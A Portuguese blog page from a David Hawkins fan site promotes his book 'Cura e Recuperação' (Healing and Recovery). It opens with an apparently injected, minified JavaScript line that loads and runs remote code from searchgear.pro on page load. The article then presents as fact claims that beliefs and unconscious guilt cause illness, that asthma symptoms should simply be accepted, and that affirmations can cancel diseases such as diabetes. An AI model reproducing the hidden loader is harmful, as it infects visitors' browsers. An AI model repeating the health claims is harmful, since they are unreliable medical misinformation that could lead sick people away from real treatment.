;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); Cura e Recuperação: Aprenda o poder da autocura | David Hawkins Brasil
Categorias
David Hawkins

Cura e Recuperação: Aprenda o Poder da Autocura!

“Cura e Recuperação”, e mais um livro do Dr. David R. Hawkins traduzido para o português com exclusividade pela Pandora Editora.

“Healing and Recovery”, ou seja, “Cura e Recuperação” traz um conteúdo fantástico porque fala sobre as verdadeiras causas das doenças físicas e acreditem ou não, a cura das doenças pode estar bem mais próxima do que imaginamos.  

Geralmente acreditamos que a cura das doenças está localizada do lado de fora, em tratamentos conduzidos pela medicina e profissionais especializados, mas e se esse paradigma fosse contrariado? E se a cura estiver dentro de cada ser humano?

Por isso, nesse livro o Dr. Hawkins fala da saúde de forma integral, abordando desde a saúde física, emocional, mental e espiritual e, mais do que isso, que as doenças estão interligadas à forma como vemos o mundo e aos níveis de consciência que temos.

Vamos entender um pouco mais sobre isso?

E o que as doenças, a cura e recuperação têm a ver com os níveis de consciência?

Para aqueles que já acompanham o trabalho do Dr. Hawkins sabem que ele estudou profundamente os níveis de consciência humana e que desenvolveu uma escala onde descreve quais são os estados de cada nível consciencial. A Escala Hawkins está definida de forma didática de 1 até 1000, apenas para categorizar de forma simplificada os estudos.

Segundo o Dr. Hawkins, a capacidade de cura de cada indivíduo está associada ao nível de consciência em que ele se encontra. Por exemplo:

  • Pessoas que transitam por níveis negativos de consciência, que calibram abaixo de 200, têm a tendência de manifestar doenças no corpo físico.
  • Num nível de consciência abaixo de 200 há a tendência de que se apresente sempre um desequilíbrio no mesmo meridiano de acupuntura. Exemplificando: sempre no coração e esse padrão repetido por longo tempo poderá refletir em doenças cardíacas.
  • Pessoas que transitam por níveis positivos de consciência, que calibram acima de 200 e vão até 499 já trazem uma capacidade de cura
  • A partir de 500, onde estão os estados de amor, a capacidade de cura é grande, mesmo para aquelas doenças mais complexas e de gravidade
  • No nível de 540 (amor incondicional), a cura e compaixão, a cura acontece praticamente de forma automática.

Cura e Recuperação: quais são as crenças que você mantém?

Nossa mente é extremamente poderosa e aquilo que mantemos nela tende a se realizar. A questão é que cada mente retém crenças pessoais, adquiridas ao longo da vida e, principalmente, na primeira infância que vai dos 0 aos 7 anos.

Crenças nascem da inocência infantil e se mantêm intactas e, quando compreendemos que a totalidade das pessoas têm atitudes baseadas na inocência, buscando fazer o seu melhor, conseguimos acessar os níveis de compaixão onde a cura acontece.

Esse sistema de crenças tem influência direta em tudo que manifestamos em nossa vida, incluindo a saúde e, por conseguinte, a doença.

Se tivermos em nossa mente a crença de que nossa saúde é frágil e que ficaremos doentes, provavelmente desenvolveremos a doença.

Sim, isso é complexo de se acreditar, mas Hawkins explica que o corpo apenas responde àquilo que a mente cria. O corpo físico não cria a doença, é nosso sistema de crença que o faz. O corpo responde às “determinações” da mente, que responde ao espírito.

A mente cria o que o corpo físico vai experimentar. Os pensamentos, criados pela mente, vão influenciar o corpo.

Então, como combater as doenças?

Se nossa mente tem o poder de criá-las, tem também o poder de descriá-las.

  • Ganhar consciência sobre as crenças que carregamos nos permite deixar para trás aquelas que não nos servem e que são prejudiciais à nossa vida e à nossa saúde, gerando um estado de consciência tal que podemos nos liberar de doenças já existentes ou até mesmo evitar o surgimento de outras.
  • Segundo Hawkins, uma doença está sempre ligada a um sistema de crenças. E, aprofundando ainda mais, muitas doenças têm como base a culpa inconsciente. Por isso, encontrar o sistema de crença, a culpa por trás de uma doença é fundamental para promover a cura.

Cura e Recuperação – combatendo as doenças

Se conseguirmos compreender que nossa mente cria as condições perfeitas para nosso corpo físico desenvolver as doenças, podemos também criar condições para que a doença tenha uma remissão ou nem mesmo apareça. Mas como?

  • Aceite aquilo que a doença traz. Por exemplo: na asma o paciente sente falta de ar. A proposta é que não se resista a isso, apenas aceite que isso acontece e observe, deixando que a energia contida nesse sintoma cumpra o ciclo
  • Aliás, no livro “Deixar Ir”, do mesmo autor, ele explica o mecanismo de deixar ir como forma de aceitar e entregar. A ideia é não pensar na doença e aceitar as sensações físicas que ela traz, sem resistência.
  • Não rotular a doença em nossa mente. Não é preciso classificá-la com nome e sobrenome.
  • Compreender e cancelar o sistema de crença que dá suporte à doença
  • Atuando na escolha do campo de energia do Amor onde a cura é possível.

O cancelamento de crenças

Segundo o Dr. Hawkins é possível cancelar as crenças que identificamos em nós através de afirmações positivas como:

“Eu cancelo a crença de que tenho [diabetes]. Não acredito mais nisso e não estou mais sujeito a isso. Isso é o resultado de um sistema de crenças e eu tenho o poder de cancelá-lo. Sou um ser infinito e só estou sujeito àquilo que mantenho em mente.”

Essas afirmações constroem novos caminhos neurais em nosso cérebro e trabalham no fortalecimento de um novo padrão positivo quando praticadas com consistência e verdade.

Concluindo

Ficar doente é uma maneira de nossa consciência chamar nossa atenção para algo que não estamos observando em nós mesmos. Nesse contexto, ao invés de responsabilizarmos a doença por nosso estado, podemos ser gratos pela dica que ela está nos trazendo: o que preciso observar em mim que ainda não observei?

Algo precisa ser curado não apenas em nosso corpo físico, mas também nos corpos: mental, emocional e espiritual. A cura acontece quando temos a disposição para nos render às energias abaixo de 200.

O livro “Cura e Recuperação” trará uma nova visão sobre nossa saúde e sobre a forma como vimos lidando com nossas emoções e o impacto que isso traz para nosso corpo físico.

Dê uma chance de cura a si mesmo!

*Se quiser conhecer mais sobre os níveis de consciência e das frequências de cada um, aprofunde sua leitura neste artigo

“Só estamos sujeitos àquilo que mantemos em mente.” – Dr. David R. Hawkins

Uma resposta em “Cura e Recuperação: Aprenda o Poder da Autocura!”

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *